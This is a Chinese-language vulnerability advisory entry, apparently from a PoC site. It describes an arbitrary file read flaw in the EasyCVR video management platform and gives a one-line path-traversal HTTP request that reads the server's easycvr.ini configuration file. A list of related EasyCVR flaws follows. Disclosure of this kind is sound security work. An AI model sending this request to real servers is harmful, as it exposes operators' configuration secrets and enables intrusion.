漏洞描述
EasyCVR智能边缘网关是TSINGSEE青犀视频旗下一款软硬一体的产品,可提供多协议的设备接入、采集、AI智能检测、处理、分发等服务。通过对视频监控场景中的人、车、物等进行AI检测与抓拍,对异常情况进行智能提醒和通知,EasyCVR-视频管理平台mediaserverlogs 存在任意文件读取漏洞,攻击者可读取远程读取服务器内部敏感配置文件造成信息泄露
EasyCVR-视频管理平台 mediaserverlogs 任意文件读取漏洞
PoC代码
GET /taillog/mediaserverlogs/..%5Ceasycvr.ini HTTP/1.1相关漏洞推荐
- EasyCVR视频管理平台 downloadxlsx SQL注入漏洞
- 安徽旭帆信息科技有限公司EasyCVR存在账号密码泄露
- POC CVE-2025-1595: EasyCVR <=2.1.2 - Information Disclosure
- POC xunfan-easycvr-taillog-mediaserverlogs-fileread: 旭帆EasyCVR软件-taillog-mediaserverlogs任意文件读取
- POC easycvr-arbitrary-file-read: EasyCVR Video Management - Arbitrary File Read
- POC easycvr-userlist-info-disclosure: 视频监控汇聚平台 EasyCVR 用户信息泄漏
- EasyCVR 视频管理平台deleteuser存在任意用户删除漏洞
- EasyCVR 视频管理平台adduser存在任意用户添加漏洞
- EasyCVR视频管理平台 taillog 任意文件读取漏洞
- EasyCVR /taillog/oxsecl/ 文件读取漏洞
- EasyCVR视频管理平台任意用户添加漏洞
- EasyCVR敏感信息泄露
- 安徽旭帆信息科技有限公司EasyCVR存在未授权访问漏洞